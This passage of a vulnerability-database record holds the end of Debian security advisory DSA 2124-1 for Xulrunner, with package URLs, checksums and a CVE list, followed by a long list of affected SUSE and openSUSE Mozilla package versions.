Size/MD5 checksum: 407812 d8a32aaca5153e1a7b1a16eb845adeca\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-6_s390.deb\n Size/MD5 checksum: 73694 4c6e5f8fe51261b53bedf2c2a86c253b\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-6_sparc.deb\n Size/MD5 checksum: 350814 3fca198c20594b5186c6af4374137441\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-6_sparc.deb\n Size/MD5 checksum: 3573188 4e66692a21ba0b801e0738755622b32d\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-6_sparc.deb\n Size/MD5 checksum: 822252 d8d12bad98ff28922292dd6ac0033d41\n http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-6_sparc.deb\n Size/MD5 checksum: 143946 62c97e42c256b5f1b00a296929dca270\n http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-6_sparc.deb\n Size/MD5 checksum: 69772 2589d7c12b722e1143a481c9f950830a\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-6_sparc.deb\n Size/MD5 checksum: 88688 d8ad8c57f7a2323c56030ae63d2af1a3\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-6_sparc.deb\n Size/MD5 checksum: 7185904 6decab3add2327b2e45f92b7fc11f607\n http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-6_sparc.deb\n Size/MD5 checksum: 224374 ce1dc6ac823828c32fd31d440590d099\n http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-6_sparc.deb\n Size/MD5 checksum: 49466464 5b94316f597a4c08377976e5075483c5\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 1, "reporter": "Debian", "published": "2010-11-01T20:38:47", "title": "[SECURITY] [DSA 2124-1] New Xulrunner packages fix several vulnerabilities", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:13:17", "vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-0654", "CVE-2010-3177", "CVE-2010-3765", "CVE-2010-3178", "CVE-2010-3176", "CVE-2010-3174", "CVE-2010-3180", "CVE-2010-2769", "CVE-2010-3179", "CVE-2010-3183"], "modified": "2010-11-01T20:38:47", "id": "DEBIAN:DSA-2124-1:76CD5", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2010/msg00174.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "suse": [{"lastseen": "2016-09-04T11:57:58", "references": [], "affectedPackage": [{"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "mozilla-xulrunner191", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.6.12-0.7.1", "arch": "i586", "packageFilename": "MozillaFirefox-translations-common-3.6.12-0.7.1.i586.rpm", "packageName": "MozillaFirefox-translations-common", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "ia64", "packageFilename": "mozilla-nss-tools-3.12.8-1.2.1.ia64.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "ppc", "packageFilename": "mozilla-nss-tools-3.12.8-1.4.1.ppc.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "mozilla-nss-32bit-3.12.8-1.2.1.x86_64.rpm", "packageName": "mozilla-nss-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "i586", "packageFilename": "mozilla-nspr-4.8.6-1.2.1.i586.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "i586", "packageFilename": "MozillaFirefox-translations-3.6.12-0.6.1.i586.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.8.1.i586.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "libfreebl3-32bit-3.12.8-1.2.1.x86_64.rpm", "packageName": "libfreebl3-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.0.10-0.7.1", "arch": "x86_64", "packageFilename": "seamonkey-translations-common-2.0.10-0.7.1.x86_64.rpm", "packageName": "seamonkey-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.0.1-4.3.1", "arch": "x86_64", "packageFilename": "enigmail-1.0.1-4.3.1.x86_64.rpm", "packageName": "enigmail", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "i586", "packageFilename": "mozilla-nss-3.12.8-1.1.1.i586.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.0.10-0.3.1", "arch": "i586", "packageFilename": "MozillaThunderbird-translations-common-3.0.10-0.3.1.i586.rpm", "packageName": "MozillaThunderbird-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.6.12-0.1.1", "arch": "i586", "packageFilename": "MozillaFirefox-translations-common-3.6.12-0.1.1.i586.rpm", "packageName": "MozillaFirefox-translations-common", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-gnome-32bit-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-gnome-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-common-32bit-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations-common-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-32bit-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.0.1-3.3.1", "arch": "x86_64", "packageFilename": "enigmail-1.0.1-3.3.1.x86_64.rpm", "packageName": "enigmail", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-translations-other-1.9.2.12-0.8.1.i586.rpm", "packageName": "mozilla-xulrunner192-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner191-translations-other-1.9.1.15-0.1.1.ppc.rpm", "packageName": "mozilla-xulrunner191-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "4.8.6-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-4.8.6-1.1.1.x86_64.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.0.1-6.5.1", "arch": "i586", "packageFilename": "enigmail-1.0.1-6.5.1.i586.rpm", "packageName": "enigmail", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "ppc64", "packageFilename": "mozilla-nss-32bit-3.12.8-1.2.1.ppc64.rpm", "packageName": "mozilla-nss-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "s390x", "packageFilename": "mozilla-nspr-devel-4.8.6-1.2.1.s390x.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "i586", "packageFilename": "mozilla-nss-tools-3.12.8-1.4.1.i586.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "4.8.6-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-devel-4.8.6-1.1.1.x86_64.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner192-translations-32bit-1.9.2.12-0.6.1.ppc64.rpm", "packageName": "mozilla-xulrunner192-translations-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-gnome-32bit-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-gnome-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.6.12-0.1.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-translations-other-3.6.12-0.1.1.x86_64.rpm", "packageName": "MozillaFirefox-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "4.8.6-1.2.1", "arch": "ppc64", "packageFilename": "mozilla-nspr-devel-4.8.6-1.2.1.ppc64.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "4.8.6-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-devel-4.8.6-1.1.1.x86_64.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-devel-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "ppc64", "packageFilename": "mozilla-xulrunner192-gnome-32bit-1.9.2.12-0.6.1.ppc64.rpm", "packageName": "mozilla-xulrunner192-gnome-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "ppc64", "packageFilename": "mozilla-nss-tools-3.12.8-1.2.1.ppc64.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.0.10-0.1.1", "arch": "ppc", "packageFilename": "seamonkey-2.0.10-0.1.1.ppc.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "libfreebl3-32bit-3.12.8-1.1.1.x86_64.rpm", "packageName": "libfreebl3-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "libsoftokn3-32bit-3.12.8-1.1.1.x86_64.rpm", "packageName": "libsoftokn3-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "i586", "packageFilename": "MozillaFirefox-3.6.12-0.6.1.i586.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.6.12-0.7.1", "arch": "i586", "packageFilename": "MozillaFirefox-3.6.12-0.7.1.i586.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-32bit-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner192-translations-common-1.9.2.12-0.1.1.ppc.rpm", "packageName": "mozilla-xulrunner192-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "4.8.6-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nspr-32bit-4.8.6-1.1.1.x86_64.rpm", "packageName": "mozilla-nspr-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.0.10-0.7.1", "arch": "i586", "packageFilename": "seamonkey-2.0.10-0.7.1.i586.rpm", "packageName": "seamonkey", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "ppc", "packageFilename": "mozilla-nss-devel-3.12.8-1.4.1.ppc.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "i586", "packageFilename": "libfreebl3-3.12.8-1.1.1.i586.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.3", "packageVersion": "3.12.8-1.4.1", "arch": "x86_64", "packageFilename": "mozilla-nss-tools-3.12.8-1.4.1.x86_64.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.0.10-0.3.1", "arch": "x86_64", "packageFilename": "MozillaThunderbird-translations-other-3.0.10-0.3.1.x86_64.rpm", "packageName": "MozillaThunderbird-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.0.10-0.7.1", "arch": "i586", "packageFilename": "seamonkey-translations-common-2.0.10-0.7.1.i586.rpm", "packageName": "seamonkey-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-buildsymbols-1.9.2.12-0.1.1.i586.rpm", "packageName": "mozilla-xulrunner192-buildsymbols", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.6.12-0.7.1", "arch": "i586", "packageFilename": "MozillaFirefox-translations-common-3.6.12-0.7.1.i586.rpm", "packageName": "MozillaFirefox-translations-common", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-translations-1.9.2.12-0.6.1.i586.rpm", "packageName": "mozilla-xulrunner192-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "ia64", "packageFilename": "mozilla-nss-devel-3.12.8-1.2.1.ia64.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "4.8.6-1.2.1", "arch": "i586", "packageFilename": "mozilla-nspr-devel-4.8.6-1.2.1.i586.rpm", "packageName": "mozilla-nspr-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.6.12-0.7.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-translations-other-3.6.12-0.7.1.x86_64.rpm", "packageName": "MozillaFirefox-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-certs-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss-certs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.0.10-0.1.1", "arch": "x86_64", "packageFilename": "seamonkey-dom-inspector-2.0.10-0.1.1.x86_64.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.0.10-0.3.1", "arch": "i586", "packageFilename": "MozillaThunderbird-translations-other-3.0.10-0.3.1.i586.rpm", "packageName": "MozillaThunderbird-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11", "packageVersion": "1.9.2.12-0.6.1", "arch": "s390x", "packageFilename": "mozilla-xulrunner192-translations-32bit-1.9.2.12-0.6.1.s390x.rpm", "packageName": "mozilla-xulrunner192-translations-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "4.8.6-1.2.1", "arch": "s390x", "packageFilename": "mozilla-nspr-4.8.6-1.2.1.s390x.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-common-32bit-1.9.2.12-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations-common-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "ppc", "packageFilename": "mozilla-nss-tools-3.12.8-1.1.1.ppc.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.0.1-6.5.1", "arch": "x86_64", "packageFilename": "enigmail-1.0.1-6.5.1.x86_64.rpm", "packageName": "enigmail", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "4.8.6-1.1.1", "arch": "i586", "packageFilename": "mozilla-nspr-4.8.6-1.1.1.i586.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.12.8-1.1.1", "arch": "x86_64", "packageFilename": "mozilla-nss-devel-3.12.8-1.1.1.x86_64.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "3.0.10-0.5.1", "arch": "ppc", "packageFilename": "MozillaThunderbird-devel-3.0.10-0.5.1.ppc.rpm", "packageName": "MozillaThunderbird-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-devel-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-buildsymbols-1.9.2.12-0.8.1.i586.rpm", "packageName": "mozilla-xulrunner192-buildsymbols", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "ia64", "packageFilename": "mozilla-nss-x86-3.12.8-1.2.1.ia64.rpm", "packageName": "mozilla-nss-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.12.8-1.1.1", "arch": "i586", "packageFilename": "mozilla-nss-3.12.8-1.1.1.i586.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.0.10-0.1.1", "arch": "x86_64", "packageFilename": "seamonkey-irc-2.0.10-0.1.1.x86_64.rpm", "packageName": "seamonkey-irc", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-translations-other-1.9.1.15-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "i586", "packageFilename": "libfreebl3-3.12.8-1.2.1.i586.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "x86_64", "packageFilename": "libfreebl3-3.12.8-1.2.1.x86_64.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-32bit-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "3.0.10-0.3.1", "arch": "x86_64", "packageFilename": "MozillaThunderbird-devel-3.0.10-0.3.1.x86_64.rpm", "packageName": "MozillaThunderbird-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "4.8.6-1.1.1", "arch": "i586", "packageFilename": "mozilla-nspr-4.8.6-1.1.1.i586.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "3.12.8-1.2.1", "arch": "s390x", "packageFilename": "mozilla-nss-32bit-3.12.8-1.2.1.s390x.rpm", "packageName": "mozilla-nss-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.1.15-0.2.1", "arch": "i586", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.15-0.2.1.i586.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-js192-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-js192", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.9.2.12-0.8.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-other-32bit-1.9.2.12-0.8.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations-other-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.0.10-0.3.1", "arch": "x86_64", "packageFilename": "MozillaThunderbird-translations-common-3.0.10-0.3.1.x86_64.rpm", "packageName": "MozillaThunderbird-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.0.10-0.7.1", "arch": "x86_64", "packageFilename": "seamonkey-dom-inspector-2.0.10-0.7.1.x86_64.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-devel-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.1.15-0.1.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.15-0.1.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "i586", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.6.1.i586.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.3", "packageVersion": "4.8.6-1.6.1", "arch": "ia64", "packageFilename": "mozilla-nspr-x86-4.8.6-1.6.1.ia64.rpm", "packageName": "mozilla-nspr-x86", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11", "packageVersion": "4.8.6-1.2.1", "arch": "i586", "packageFilename": "mozilla-nspr-4.8.6-1.2.1.i586.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "2.0.10-0.7.1", "arch": "i586", "packageFilename": "seamonkey-dom-inspector-2.0.10-0.7.1.i586.rpm", "packageName": "seamonkey-dom-inspector", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-translations-other-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-translations-other", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-32bit-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.1.1", "arch": "ppc", "packageFilename": "mozilla-xulrunner192-devel-1.9.2.12-0.1.1.ppc.rpm", "packageName": "mozilla-xulrunner192-devel", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server for VMware", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-translations-3.6.12-0.6.1.x86_64.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "3.12.8-1.1.1", "arch": "i586", "packageFilename": "mozilla-nss-certs-3.12.8-1.1.1.i586.rpm", "packageName": "mozilla-nss-certs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "python-xpcom191-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "python-xpcom191", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "11.1", "packageVersion": "1.9.2.12-0.6.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner192-translations-32bit-1.9.2.12-0.6.1.x86_64.rpm", "packageName": "mozilla-xulrunner192-translations-32bit", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Desktop", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "i586", "packageFilename": "libfreebl3-3.12.8-1.2.1.i586.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.3", "packageVersion": "1.9.1.15-0.2.1", "arch": "x86_64", "packageFilename": "mozilla-xulrunner191-gnomevfs-1.9.1.15-0.2.1.x86_64.rpm", "packageName": "mozilla-xulrunner191-gnomevfs", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.12.8-1.2.1", "arch": "s390x", "packageFilename": "mozilla-nss-tools-3.12.8-1.2.1.s390x.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "4.8.6-1.2.1", "arch": "s390x", "packageFilename": "mozilla-nspr-4.8.6-1.2.1.s390x.rpm", "packageName": "mozilla-nspr", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.1", "packageVersion": "2.0.10-0.1.1", "arch": "ppc", "packageFilename": "seamonkey-venkman-2.0.10-0.1.1.ppc.rpm", "packageName": "seamonkey-venkman", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "ppc64", "packageFilename": "MozillaFirefox-translations-3.6.12-0.6.1.ppc64.rpm", "packageName": "MozillaFirefox-translations", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "11.1", "packageVersion": "3.6.12-0.6.1", "arch": "ppc64", 